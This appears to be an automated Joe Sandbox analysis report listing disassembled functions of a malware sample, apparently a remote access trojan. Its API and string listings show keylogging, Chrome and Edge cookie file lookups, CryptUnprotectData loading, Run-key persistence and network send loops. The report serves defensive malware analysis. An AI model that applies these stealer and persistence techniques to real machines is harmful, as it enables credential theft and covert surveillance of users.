                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                    • String ID: *?$.
                                    • API String ID: 2812119850-3972193922
                                    • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                    • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                    • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                    • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                    Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountEventTick
                                    • String ID: !D@$NG
                                    • API String ID: 180926312-2721294649
                                    • Opcode ID: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                    • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                    • Opcode Fuzzy Hash: 1409f91683eb0d13268e59a75ed27cf67ebd121d06af2735119167055e625867
                                    • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                    Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                                    • String ID: XQG$NG$PG
                                    • API String ID: 1634807452-3565412412
                                    • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                    • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                    • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                    • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                    Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe,00000104), ref: 00443515
                                    • _free.LIBCMT ref: 004435E0
                                    • _free.LIBCMT ref: 004435EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe
                                    • API String ID: 2506810119-468870746
                                    • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                    • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                    • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                    • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                    Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                    • GetLastError.KERNEL32 ref: 0044B9B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                    • String ID: PkGNG
                                    • API String ID: 2456169464-263838557
                                    • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                    • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                    • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                    • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                    Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                      • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                      • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "$0NG
                                    • API String ID: 368326130-3219657780
                                    • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                    • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                    • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                    • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                    Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 00416330
                                      • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                      • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                      • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                      • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen$CloseCreateValue
                                    • String ID: !D@$okmode$PG
                                    • API String ID: 3411444782-3370592832
                                    • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                    • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                    • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                    • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                    Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                    • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                    • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                    • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                    • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                    Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                    • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                    Strings
                                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                    • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                    • API String ID: 1174141254-1980882731
                                    • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                    • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                    • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                    • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                    Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTimewsprintf
                                    • String ID: Offline Keylogger Started
                                    • API String ID: 465354869-4114347211
                                    • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                    • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                    • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                    • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                    Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                    • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread$LocalTime$wsprintf
                                    • String ID: Online Keylogger Started
                                    • API String ID: 112202259-1258561607
                                    • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                    • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                    • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                    • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                    Function 0041B580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                    • API String ID: 481472006-3277280411
                                    • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                    • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                    • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                    • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                    Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00404F81
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                    • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$EventLocalThreadTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 2532271599-1507639952
                                    • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                    • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                    • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                    • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                    Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                    • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: CryptUnprotectData$crypt32
                                    • API String ID: 2574300362-2380590389
                                    • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                    • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                    • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                    • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                    Function 0044C2D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                    • GetLastError.KERNEL32 ref: 0044C316
                                    • __dosmaperr.LIBCMT ref: 0044C31D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: PkGNG
                                    • API String ID: 2336955059-263838557
                                    • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                    • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                    • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                    • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                    • CloseHandle.KERNEL32(?), ref: 004051CA
                                    • SetEvent.KERNEL32(?), ref: 004051D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection Timeout
                                    • API String ID: 2055531096-499159329
                                    • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                    • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                    • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                    • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                    Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 2005118841-1866435925
                                    • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                    • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                    • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                    • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                    Function 0041CB72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                    • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FormatFreeLocalMessage
                                    • String ID: @J@$PkGNG
                                    • API String ID: 1427518018-1416487119
                                    • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                    • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                    • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                    • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                    Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 00413888
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 1818849710-1051519024
                                    • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                    • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                    • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                    Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                      • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                      • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                    • String ID: bad locale name
                                    • API String ID: 3628047217-1405518554
                                    • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                    • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                    • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                    • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                    Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                    • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                    • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Control Panel\Desktop
                                    • API String ID: 1818849710-27424756
                                    • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                    • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                    • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                    Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                    • ShowWindow.USER32(00000009), ref: 00416C9C
                                    • SetForegroundWindow.USER32 ref: 00416CA8
                                      • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                      • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                      • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
